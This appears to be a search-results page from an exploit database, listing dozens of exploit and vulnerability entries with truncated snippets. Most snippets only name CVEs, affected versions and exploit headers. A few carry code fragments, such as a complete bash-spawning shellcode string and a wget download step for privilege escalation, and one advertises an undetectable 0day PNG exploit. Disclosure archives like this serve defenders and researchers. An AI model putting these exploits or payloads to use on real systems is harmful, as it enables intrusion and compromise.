39001 matches found
Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit
Microsoft Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currentl...
BlogEngine.NET 3.3.7 Directory Traversal / Remote Code Execution Vulnerability #RCE
BlogEngine.NET versions 3.3.7 and earlier are vulnerable to two separate directory traversal issues that can lead to remote code execution. BlogEngine.NET, versions 3.3.7 and earlier, is vulnerable to two separate Directory Traversal issues that can lead to Remote Code Execution. CVE-2019-10719...
Apple iOS 17.2.1 Screen Time Passcode Retrieval / Mitigation Bypass Vulnerabilities
A mitigation bypass / privilege escalation flaw has been discovered in Apple's iOS Screen Time functionality, granting one access to modify the restrictions. It allows a local attacker to acquire the Screen Time Passcode by bypassing the anti-bruteforce protections on the four-digit Passcode, and...
Linux Kernel 2.6.x pipe.c Privilege Escalation Exploit
Linux kernel versions 2.6.10 up to but not including 2.6.31.5 pipe.c privilege escalation exploit. / expmoosecox.c Watch a video of the exploit here: http://www.youtube.com/watch?v=jt81NvaOj5Y developed entirely by Ingo Molnar exploit writer extraordinaire! , thanks to Fotis Loukos for pointing t...
MagnusBilling Remote Command Execution Exploit
This Metasploit module exploits a command injection vulnerability in MagnusBilling application versions 6.x and 7.x that allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. A piece of demonstration code is present in lib/icepay/icepay.php, with a call to an exec...
PNG Silent Arbitrary Code Execution FUD Exploit
0day PNG Exploit. All Chrome, Edge, Opera, Firefox, Microsoft Internet Explorer, Yandex, tested. Running smoothly Latest version. Windows 7, Windows 8, Windows 8.1, Windows 10 Tested Works in the latest versions. All Mail services were Tested bypass, Gmail, Hotmail, Yahoo, Yandex-mail, Foxmail, Q...
Zimbra Collaboration Autodiscover Servlet XXE / ProxyServlet SSRF Exploit
This Metasploit module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains a...
Rails 5.0.1 - Remote Code Execution Exploit
Exploit for ruby platform in category web applications Exploit Title: Rails 5.0.1 - Remote Code Execution Exploit Author: Lucas Amorim Vendor Homepage: www.rubyonrails.org Software Link: www.rubyonrails.org Version: Rails " end if ARGV.length 3 header exit-1 end url = ARGV0 ip = ARGV1 port = ARGV...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Exploit
Exploit for java platform in category remote exploits Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage:...
PHP < 8.3.8 - Unauthenticated Remote Code Execution (Windows) Exploit
This Metasploit module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations on a Windows target. A vulnerable configuration is locale dependant such as Chinese or Japanese, such that the Unicode best-fit conversion scheme will unexpectedly convert a soft...
Moodle SpellChecker Path Authenticated Remote Command Execution Exploit
Moodle allows an authenticated administrator to define spellcheck settings via the web interface. An administrator can update the aspell path to include a command injection. This is extremely similar to CVE-2013-3630, just using a different variable. This Metasploit module was tested against Mood...
Pi-hole 4.3.2 - Remote Code Execution (Authenticated) Exploit
Exploit for linux platform in category web applications !/usr/bin/env python2 Exploit Title: Pi-hole 4.3.2 - Remote Code Execution Authenticated Date: 2020-08-04 Exploit Author: Luis Vacas @CyberVaca Vendor Homepage: https://pi-hole.net/ Software Link: https://github.com/pi-hole/pi-hole Version: ...
Uniview - Remote Command Execution / Export Config (PoC) Vulnerability
Exploit for multiple platform in category remote exploits STX Subject: Uniview RCE and export config PoC Researcher: bashis October 2017 Attack Vector: Remote Authentication: Anonymous no credentials needed Export config...
elFinder Archive Command Injection Exploit
elFinder versions below 2.1.59 are vulnerable to a command injection vulnerability via its archive functionality. When creating a new zip archive, the name parameter is sanitized with the escapeshellarg php function and then passed to the zip utility. Despite the sanitization, supplying the -TmTT...
Cuppa CMS Remote / Local File Inclusion Vulnerability
Cuppa CMS suffers from remote and local file inclusion vulnerabilities. Exploit Title : Cuppa CMS File Inclusion Date : 4 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://www.cuppacms.com/ Software Link :...
WiFi Mouse 1.7.8.5 - Remote Code Execution Exploit (2)
Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution Author: H4rk3nz0 Vendor Homepage: http://necta.us/ Software Link: http://wifimouse.necta.us/download Version: 1.7.8.5 Tested on: Windows Enterprise Build 17763 Python 3 port done by RedHatAugust Original exploit:...
Exchange Control Panel Viewstate Deserialization Exploit
This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel ECP web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With...
Dahua Authentication Bypass Vulnerability
STX Subject: Update: Dahua Authentication bypass CVE-2021-33044, CVE-2021-33045 Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis 2021 Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole -=Dahua=-...
Microsoft Windows Remote Desktop - BlueKeep Denial of Service Exploit
import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...
WIFICAM Wireless IP Camera (P2P) - Unauthenticated Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits include include include include include include include include define CAMPORT 80 define REMOTEHOST "192.168.1.1" define REMOTEPORT "1337" define PAYLOAD0 "GET...
Binwalk v2.3.2 - Remote Command Execution Exploit
Exploit Title: Binwalk v2.3.2 - Remote Command Execution RCE Exploit Author: Etienne Lacoche CVE-ID: CVE-2022-4510 import os import inspect import argparse print"" print"" print"------------------CVE-2022-4510----------------" print"" print"--------Binwalk Remote Command Execution--------"...
Microsoft Windows - (SMBGhost) Remote Code Execution Exploit
!/usr/bin/env python ''' EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip SMBGhostRCEPoC RCE PoC for CVE-2020-0796 "SMBGhost" For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of m...
WordPress Core 5.9.0 / 5.9.1 Cross Site Scripting Vulnerability
Contributor+ Stored Cross Site Scripting Vulnerability Description: Contributor+ Stored XSS Affected Versions: WordPress Core 5.9.0-5.9.1 CVE ID: Pending CVSS Score: 8.0 High CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H Fully Patched Version: 5.9.2 Researcher/s: Ben Bidner WordPress...
Cisco Adaptive Security Appliance Path Traversal Exploit
This Metasploit module exploits a security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. require 'msf/core' class MetasploitModule "Cisco Adaptive Security Appliance - Path Traversal",...
online product / shop online (productdetail.cfm) SQL Injection
Exploit for asp platform in category web applications ============================================================== online product / shop online productdetail.cfm SQL Injection ============================================================== + Category : vurnerebility SQLI online product + Running...
Roxy File Manager 1.4.5 PHP File Upload Restriction Bypass Exploit
Roxy File Manager version 1.4.5 proof of concept exploit for a PHP file upload restriction bypass vulnerability. Exploit Title: Roxy File Manager 1.4.5 PHP File Upload Restriction Bypass Exploit Author: Adam Shebani NULLHE4D Software: Roxy File Manager Version: 1.4.5 CVE: CVE-2018-20525 Vendor...
Apache Superset 2.0.0 Remote Code Execution Exploit
Apache Superset versions 2.0.0 and below utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their userid to that of an administrator, and re-sign the cooki...
deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability
Exploit for unknown platform in category web applications ====================================================================== deV!Lz Clanportal DZCP = 1.4.5 Remote File Disclosure Vulnerability ====================================================================== DZCP Devilz Clanportal = 1.4....
ClipShare 2.6 Remote User Password Change Exploit
Exploit for unknown platform in category web applications ================================================= ClipShare 2.6 Remote User Password Change Exploit ================================================= !/usr/bin/perl -w priv8 Pr0metheuS Exploit Name: Clipshare Remote User Password Change...
Pluck CMS 4.7.16 - Remote Code Execution (Authenticated) Exploit
Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution RCE Authenticated Exploit Author: Ashish Koli Shikari Vendor Homepage: https://github.com/pluck-cms/pluck Version: 4.7.16 Tested on Ubuntu 20.04.3 LTS CVE: CVE-2022-26965 Usage : python3 exploit.py Example: python3 exploit.py 127.0.0.1 80...
Win32k NtGdiResetDC Use-After-Free / Local Privilege Escalation Exploit
A use after free vulnerability exists in the NtGdiResetDC function of Win32k which can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists due to the fact that this function calls hdcOpenDCW, which performs a user mode callback. During this callback...
CentOS 7.6 - ptrace_scope Privilege Escalation Exploit #RCE #LPE
Exploit for linux platform in category local exploits !/usr/bin/env bash 'ptracescope' misconfiguration Local Privilege Escalation Affected operating systems TESTED: Parrot Home/Workstation 4.6 Latest Version Parrot Security 4.6 Latest Version CentOS / RedHat 7.6 Latest Version Kali Linux 2018.4...
RiteCMS 2.2.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: RiteCMS 2.2.1 - Remote Code Execution Exploit Author: Enes Özeser Vendor Homepage: http://ritecms.com/ Version: 2.2.1 Tested on: Linux 1- Go to following url. http://CHANGE-THIS/ritecms/cms/ 2- Default username and password is...
SSDWLAB 6.1 - Authentication #Bypass Vulnerability
Exploit for asp platform in category web applications Exploit Title: SSDWLAB 6.1 - Authentication Bypass Exploit Author: Luis Buendía exoticpayloads Vendor Homepage: http://www.sbpsoftware.com/ Version: 6.1 Tested on: IIS 7.5 CVE : Pending Description: By injection on the SOAP function in the...
D-Link DGS-1250 Header Injection Vulnerability
Exploit for hardware platform in category web applications D-Link DGS-1250 header injection vulnerability ============================================== The latest version of this advisory is available at: https://sintonen.fi/advisories/d-link-dgs-1250-header-injection.txt Overview -------- D-Lin...
Gitea Git Fetch Remote Code Execution Exploit
This Metasploit module exploits the Git fetch command in the Gitea repository migration process to allow for remote command execution on the system. This vulnerability affect Gitea versions prior to 1.16.7. This module requires Metasploit: https://metasploit.com/download Current source:...
Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)
Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...
Remote Mouse 4.110 Remote Code Execution Exploit
This Metasploit module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password default. Tested against 4.110, current at the time of module writing. This module...
Apache Tomcat Manager Code Execution Exploit
This Metasploit module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets var...
Pentaho Business Analytics / Pentaho Business Server 9.1 Authentication Bypass Vulnerability
Product: Pentaho Business Analytics / Pentaho Business Server Vendor / Manufacturer: Hitachi Vantara Affected Versions: sec:intercept-url pattern="\A/api/.\Z" access="Authent...
ZoneMinder Snapshots Command Injection Exploit
This Metasploit module exploits an unauthenticated command injection in zoneminder that can be exploited by appending a command to an action of the snapshot view. Versions prior to 1.36.33 and 1.37.33 are affected. This module requires Metasploit: https://metasploit.com/download Current source:...
Microsoft SQL Server 2014 / 2016 / 2017 / 2019 / 2022 Audit Logging Failure Vulnerability
Microsoft SQL Server 2014, 2016, 2017, 2019, and 2022 appears to ignore audit rules for sys.sysxlgns allowing an attacker with administrative permissions to extract password hashes under the radar. Microsoft told the researcher they are not willing to fix it but acknowledge it as a security...
Ntpdc 4.2.6p3 - Local Buffer Overflow Exploit
Ntpdc version 4.2.6p3 suffers from a local buffer overflow vulnerability. Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/ from os import system, environ from struct import pack import sys ntpdc 4.2.6p3 bof @dronesec tested on x86 Ubuntu 12.04.5 LTS IMAGEBASE = 0x80000000...
ADAN Neuronlabs (view.php ) SQL Injection Vulnerability
Exploit for php platform in category web applications -------------------------------------------------------- ADAN view.php Sql Injection Vulnerability -------------------------------------------------------- Date 04-03-2011 -------------------------------------------------------- Discovered By:...
Ubuntu 18.04 - (lxd) Privilege Escalation Exploit #LPE #RCE
Exploit for linux platform in category local exploits !/usr/bin/env bash ---------------------------------- Authors: Marcelo Vazquez S4vitar Victor Lasa vowkin ---------------------------------- Step 1: Download build-alpine = wget...
WordPress All-in-One Video Gallery plugin 2.4.9 Plugin - Local File Inclusion Vulnerability
Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion LFI Exploit Author: Mohamed Magdy Abumusilm Aka m19o Software: All-in-One Video Gallery plugin Version: = 2.4.9 Tested on: Windows,linux Poc:...
CuteNews 2.1.2 Shell Upload Exploit
CuteNews version 2.1.2 Avatar upload remote shell upload exploit. Original discovery of remote shell upload in this version is attributed to Ozkan Mustafa Akkus in April of 2019. ! /usr/bin/env python3 Exploit Title: CuteNews 2.1.2 - Avatar upload RCE Authenticated Exploit Author: Mayank Deshmukh...
phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= phNNTP = 1.3 article-raw.php Remote File Include Vulnerability ================================================================= phNNTP v1.3 Remote File Inclusion CreW: Toxi...
Microsoft Windows 10 Build 1803 < 1903 - (COMahawk) Local Privilege Escalation Exploit
EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322 Video Dem...
PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/ Version: v5.2.3 Category:...